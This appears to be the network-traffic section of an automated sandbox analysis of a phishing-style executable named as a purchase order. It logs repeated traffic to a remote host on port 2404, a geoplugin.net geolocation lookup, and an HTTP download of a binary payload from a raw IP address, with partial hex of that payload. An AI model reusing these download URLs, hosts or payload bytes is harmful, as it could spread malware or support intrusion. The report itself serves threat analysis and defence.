                                                            Dec 16, 2024 15:28:12.279417038 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.279427052 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.279438019 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.279448986 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.279449940 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.279460907 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.279472113 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.279475927 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.279484987 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.279495955 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.279505968 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.279536963 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.280173063 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.280186892 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.280198097 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.280229092 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.280263901 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.280319929 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.280333042 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.280371904 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.280380011 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.280384064 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.280402899 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.280414104 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.280432940 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.280458927 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.280458927 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.280469894 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.280482054 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.280494928 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.280519009 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.280538082 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.281136036 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.281148911 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.281168938 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.281191111 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.281202078 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.281203985 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.281214952 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.281227112 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.281241894 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.281287909 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.281795025 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.281800985 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.281826973 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.281838894 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.281857967 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.281900883 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.281922102 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.281934977 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.281945944 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.281966925 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.281985044 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.282016039 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.282016039 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.282035112 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.282046080 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.282063007 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.282069921 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.282083988 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.282125950 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.282968044 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.282982111 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.283018112 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.283101082 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.283113956 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.283124924 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.283137083 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.283147097 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.283149004 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.283162117 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.283171892 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.283173084 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.283193111 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.283202887 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.283210993 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.283215046 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.283226967 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.283240080 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.283263922 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.283279896 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.283318996 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.283691883 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.283714056 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.283726931 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.283761024 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.283778906 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.283792019 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.283824921 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.283845901 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.283859015 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.283890009 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.283950090 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.283962011 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.283973932 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.283986092 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.283994913 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.283998966 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.284010887 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.284023046 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.284023046 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.284058094 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.284092903 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.284781933 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.284792900 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.284897089 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.284909010 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.284921885 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.284934998 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.284945965 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.284956932 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.284970045 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.284982920 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.284997940 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.284997940 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.285012960 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.285031080 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.285573959 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.285586119 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.285597086 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.285609007 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.285619974 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.285629988 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.285633087 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.285640955 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.285653114 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.285664082 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.285675049 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.285684109 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.285686016 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.285697937 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.285708904 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.285716057 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.285727978 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.285748959 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.286477089 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.286489964 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.286500931 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.286513090 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.286521912 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.286528111 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.286560059 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.286659956 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.286672115 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.286681890 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.286685944 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.286694050 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.286722898 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.286745071 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.287195921 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.287364960 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.287379026 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.287391901 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.287405014 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.287410975 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.287417889 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.287427902 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.287434101 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.287439108 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.287446976 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.287456989 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.287468910 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.287481070 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.287482977 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.287502050 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.287520885 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.288141012 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.288288116 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.288312912 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.288325071 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.288336992 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.288347006 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.288347960 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.288377047 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.288378000 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.288388968 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.288402081 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.288414001 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.288423061 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.288448095 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.288465977 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.296174049 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.312700987 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.396109104 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.396190882 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.396251917 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.396707058 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.396851063 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.396903038 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:12.398113966 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:12.444806099 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:14.646827936 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:14.766783953 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:14.766798973 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:14.766829967 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:14.766839027 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:14.766917944 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:14.766917944 CET497982404192.168.2.8162.251.122.87
                                                            Dec 16, 2024 15:28:14.766969919 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:14.766979933 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:14.766985893 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:14.767028093 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:14.767081022 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:14.767146111 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:14.886970043 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:14.887025118 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:14.887166977 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:14.887176991 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:14.887281895 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:14.887291908 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:14.887715101 CET240449798162.251.122.87192.168.2.8
                                                            Dec 16, 2024 15:28:14.887820959 CET497982404192.168.2.8162.251.122.87
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 16, 2024 15:28:09.016388893 CET5627553192.168.2.81.1.1.1
                                                            Dec 16, 2024 15:28:09.253674030 CET53562751.1.1.1192.168.2.8
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Dec 16, 2024 15:28:09.016388893 CET192.168.2.81.1.1.10xb80aStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Dec 16, 2024 15:28:09.253674030 CET1.1.1.1192.168.2.80xb80aNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                            • 66.63.187.30
                                                            • geoplugin.net
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.84977666.63.187.30806752C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 15:28:00.354224920 CET175OUTGET /hpVMAPRZVuaX36.bin HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                            Host: 66.63.187.30
                                                            Cache-Control: no-cache
                                                            Dec 16, 2024 15:28:01.725184917 CET1236INHTTP/1.1 200 OK
                                                            Content-Type: application/octet-stream
                                                            Last-Modified: Mon, 16 Dec 2024 11:12:34 GMT
                                                            Accept-Ranges: bytes
                                                            ETag: "5f233e68ab4fdb1:0"
                                                            Server: Microsoft-IIS/10.0
                                                            Date: Mon, 16 Dec 2024 14:28:01 GMT
                                                            Content-Length: 493120
                                                            Data Raw: 75 4b 43 8b d4 8d 12 a6 ec 34 52 16 8c 8c d8 5b 6b 88 b2 c9 91 e4 a8 c5 88 83 5e b4 33 bc 62 bd 73 a2 a0 24 cc 66 7c 75 be e9 80 58 32 ae 92 86 19 b0 41 c8 8f 1a b4 64 8c 11 f5 c8 36 44 20 2e da 6b 0b 34 d2 05 3d 0b b9 00 c5 10 f5 6c 8d 13 e6 da 0c 1c 2d bd fc ec ea c0 5b e9 d6 d2 ce 6a 92 a2 49 dd 6a 17 a9 8d 57 c1 f5 b1 78 43 f6 ee f1 65 61 d7 9e 9e d6 70 5c c0 5c b9 72 ad 4a 7e 76 62 ab f0 45 30 ef 5a ef c2 d6 a5 6b 4a 0e 30 65 c0 38 0d 4a c2 7e 35 9c 7b 5e d9 16 81 10 67 86 65 30 3e 8e 0f f9 f5 b3 0d d8 a3 57 c6 6e aa fe 01 19 3c 95 16 28 7a 20 42 28 5e de 99 89 59 61 08 71 72 19 83 35 63 ea 81 92 b5 5d 40 b0 18 ca 64 b7 c7 05 14 ac 86 2e 44 3c 20 be 30 02 87 f5 39 59 52 2f 20 de 9d 82 e4 e9 26 98 2b 4b 85 56 96 80 10 07 98 24 79 67 70 85 46 71 6f 83 e5 17 f4 6e 5a 25 e4 60 b4 cc 91 8a 5f 98 ba 69 3f 43 ce 6d ec f1 ec 86 5d 2a 2f 49 6a a3 45 8f d0 76 52 9b ab 88 3b c3 27 38 72 d6 b0 9a 79 44 a1 29 6a b1 ee 1f da 7d 52 36 80 f1 56 6b 9e 9f 47 d3 2c 15 c6 d4 f5 38 8d 1c e1 53 28 09 86 f6 ce db cc [TRUNCATED]
                                                            Data Ascii: uKC4R[k^3bs$f|uX2Ad6D .k4=l-[jIjWxCeap\\rJ~vbE0ZkJ0e8J~5{^ge0>Wn<(z B(^Yaqr5c]@d.D< 09YR/ &+KV$ygpFqonZ%`_i?Cm]*/IjEvR;'8ryD)j}R6VkG,8S(`G@\Xf6U/W:VPL)K[BBRG=^KeC0@TnhRzeDB~;vN?/.Oy_/&W*N,.H]DQ0F+OZ]MF#w]&v\"/9)%CG]#Za79aasEmQ^7rM>|`_-f3vvRbl1_'z}CL:/JVgX{]iM!mCdfhH'B{C_%5zs8z<w?&0QNa`~ypH`RJa&=TPljZWsKH[+7@g#$Id~\GJA95R(7+(jqAj3qJ86uac0x*{-~TbAYBOC0x9!l:R!o" ,bC<r6ALnk&&d%rF7JVDJs3dr)#=s
                                                            Dec 16, 2024 15:28:01.725224972 CET224INData Raw: 6b 68 6f 3e a9 ad 55 6f 19 06 5d c0 65 f5 37 0b d2 9b 48 eb 18 1c 76 98 6c ff 8c 07 bd 7a d5 80 0c 72 75 bc 9f f9 54 41 7f f1 a3 9a 3d 39 d0 e4 46 eb f6 a4 ec 8d d7 8f a9 c0 e2 93 a8 73 f5 ae 65 d2 46 a4 cc 5e 38 e1 e8 ea be 61 04 83 d6 9e 29 8e
                                                            Data Ascii: kho>Uo]e7HvlzruTA=9FseF^8a)\+K?=e*@^[rTPIJEJ_1[Wz0XXO)^7w>GKJI7&U2nL:Zq06/9(
                                                            Dec 16, 2024 15:28:01.725239992 CET1236INData Raw: 79 91 49 9d 32 03 c8 ef 46 13 2d 4d 72 0f c3 7f 4e b6 03 43 7e 80 52 d3 a1 f1 7f 1d 26 3c ce 6a 23 30 6e ba 5d 10 0e 52 2a b0 a7 83 dc 6d e1 71 5c 23 23 d7 b7 d5 42 27 fe 29 83 e8 b7 4d 56 94 dd 2b 05 fb 68 bc 08 1e ae e9 94 e3 a7 17 37 86 5d 1d
                                                            Data Ascii: yI2F-MrNC~R&<j#0n]R*mq\##B')MV+h7]t ! l!QdK*DPLC3q?QRNMv]BK;\mN:iMCBCqc<f`9P{FIIp4G[+=P2 lDQ}
                                                            Dec 16, 2024 15:28:01.725310087 CET1236INData Raw: 9a 8a 8b 8b 0a 7f ce 6c 22 45 35 4a 41 52 a9 68 91 16 d5 87 ed d2 8a e2 f2 e1 9e 9d 71 48 91 0d 66 b2 ca 81 dc e3 56 3c 0a f5 cc 80 1a 49 67 d2 4e d3 ef 71 5a ca 06 26 f0 69 96 eb da 3f 84 0e b8 62 19 e3 d6 d6 69 e3 04 b2 5d 80 ca a9 f9 a1 77 ab
                                                            Data Ascii: l"E5JARhqHfV<IgNqZ&i?bi]wFdIKLTfIy!jSN{h|~mZcT,-:q(`qv>m%G[znSrwnD;cxFpK+&+YLHga`+?~X!L%;_:u
                                                            Dec 16, 2024 15:28:01.725326061 CET1236INData Raw: 48 17 df 22 3e d3 c1 39 eb 59 77 5d 5e 08 18 99 a4 fd bd 9e dd fe 1f d0 d8 8a 35 7e 48 23 24 ed ac 8b eb ed 3e 9e 47 4b 23 34 6e 51 6c d6 49 3d d9 58 c5 1b fc 29 67 55 09 ee 8d 58 fc 8a b3 9a 00 5c c3 92 c5 e8 8b 71 f2 62 aa b4 6d b2 10 1b 1e 87
                                                            Data Ascii: H">9Yw]^5~H#$>GK#4nQlI=X)gUX\qbmtUbk1C+N2>Eeu~pA<1!5:|[dRfj#:TvuhrQeaX(&z"*;sB^[k_-R'Q~7;HR[\@kQ
                                                            Dec 16, 2024 15:28:01.725342035 CET1236INData Raw: b1 db a5 e0 09 a6 3e 66 cb 61 24 0c fa f7 c4 3f 34 09 35 19 c0 47 3b 2f 49 df 54 a5 83 2c 57 f4 30 f9 e1 1f d9 bf ff c5 bb f2 86 f5 29 ad fd 2f 9c 4b ad 15 04 95 b2 46 a5 aa 46 ab d3 f5 87 f0 65 e5 a7 6d f3 ec c3 61 5d dc 67 b4 eb e9 b5 0c 32 7d
                                                            Data Ascii: >fa$?45G;/IT,W0)/KFFema]g2}V,SW,ABh-"jrhO~^/j!pOvs94sIthjY ?~>u@emJ3"mOL_(Y/"x{dZtcT$})p
                                                            Dec 16, 2024 15:28:01.725358009 CET1236INData Raw: cc d2 64 2f 2c 2d 48 8d 63 13 df f0 25 f2 07 3d 4c 6d 62 57 24 33 75 fb 96 ea 31 5f a8 e3 ab 58 5e 5e 67 71 bf 4c 2f 52 89 01 41 39 bd b8 74 d4 2b c6 89 2c 3d 4b 00 f6 0a a0 65 42 ae 3e 70 7e f6 43 f9 57 f1 8b b1 4c 81 40 44 cd 92 37 8e 80 cb 6e
                                                            Data Ascii: d/,-Hc%=LmbW$3u1_X^^gqL/RA9t+,=KeB>p~CWL@D7nD"7dtxe}w@E Y~^yC;K]0%%$HOpI8"j{YzNl6:7G]RW%]G[O7~
                                                            Dec 16, 2024 15:28:01.725512028 CET1236INData Raw: eb 2f f3 6c 71 fd 81 e7 e7 1f fd 56 c5 f9 60 74 6c bd 4e 16 ba 8c 1c 3a 0a 5f a6 cd 03 81 d4 68 4b d2 69 78 91 5c 83 cf 3c e9 8a 1e f6 51 19 a6 d4 b3 82 74 bf ce 60 d7 91 d1 6a 95 36 62 1d 1f 93 f4 8c 1b fe 9e 7c 89 c3 c9 1b 8d 9b b4 c4 1d 67 05
                                                            Data Ascii: /lqV`tlN:_hKix\<Qt`j6b|gFCG9*QO.m`hF+Jt&vOn5!hrXi`>TuQ4VkrlYnuC])5Vr8<gzPba)(x0
                                                            Dec 16, 2024 15:28:01.725527048 CET1236INData Raw: 7e 05 ac a6 57 c2 4f 64 71 e9 4e 31 58 01 d2 52 8e 8b f7 5c c2 5a 30 25 43 8e 0b 9f 8c 05 4a fa 10 e0 02 27 06 0d f1 05 b5 16 d4 04 96 cf 37 3e fb dd 10 40 9a 10 2b 32 44 23 6f ea 2e e4 d6 c2 7e 3c bf 3e bf 95 2f da 3b 34 03 d6 fb d1 14 94 f6 39
                                                            Data Ascii: ~WOdqN1XR\Z0%CJ'7>@+2D#o.~<>/;49-4od~X_^Mm0|Iv.^G1}zHt-l8zVCbw0O^&NM.jnXq(rnC-v `=ZcM10a-({v0@
                                                            Dec 16, 2024 15:28:01.725544930 CET1000INData Raw: 0a 25 19 a2 30 75 00 6e 8b 7d 2c 70 5f 5d 4d 13 1f 7e df 6e 2e 06 bf 98 75 93 61 20 fb 5f 21 88 a6 22 3f 5a 35 58 4f 01 f8 da 27 c8 fb 5b e3 c5 d0 90 ec 0b f2 c0 ed 5b 8b d8 f8 9b 67 28 ad 01 75 c6 0e 31 89 ad 90 9a 62 c6 a3 31 91 8c b0 2e 75 1d
                                                            Data Ascii: %0un},p_]M~n.ua _!"?Z5XO'[[g(u1b1.u3D>vL[HGugd!tG*DT1:^f`Yh]~]R@mUPmBb}!dmu5)iukP%{XQQJ
                                                            Dec 16, 2024 15:28:01.845530987 CET1236INData Raw: 0e 66 f3 b9 c1 48 69 b4 01 50 34 2c ba 5d 5c 06 ee 37 af ec 58 77 2b 62 7e 6d 20 eb eb 75 5a 11 95 48 3c 4c ba 1a c8 91 da 36 e2 37 98 d8 af 85 90 47 78 cb f9 fe 5a 65 0d 63 62 fd f6 d5 77 64 5d 91 00 6b 0c e1 63 7f 31 16 5c 73 4c e6 05 be db 95
                                                            Data Ascii: fHiP4,]\7Xw+b~m uZH<L67GxZecbwd]kc1\sLn/N&caWo.-?OG1,%@Jo'N8I?PeYJCK^J`"3i9i\V.D^.{IHd"REr[v[N\`TaygO="7EZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.849799178.237.33.50806752C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 15:28:09.377226114 CET71OUTGET /json.gp HTTP/1.1
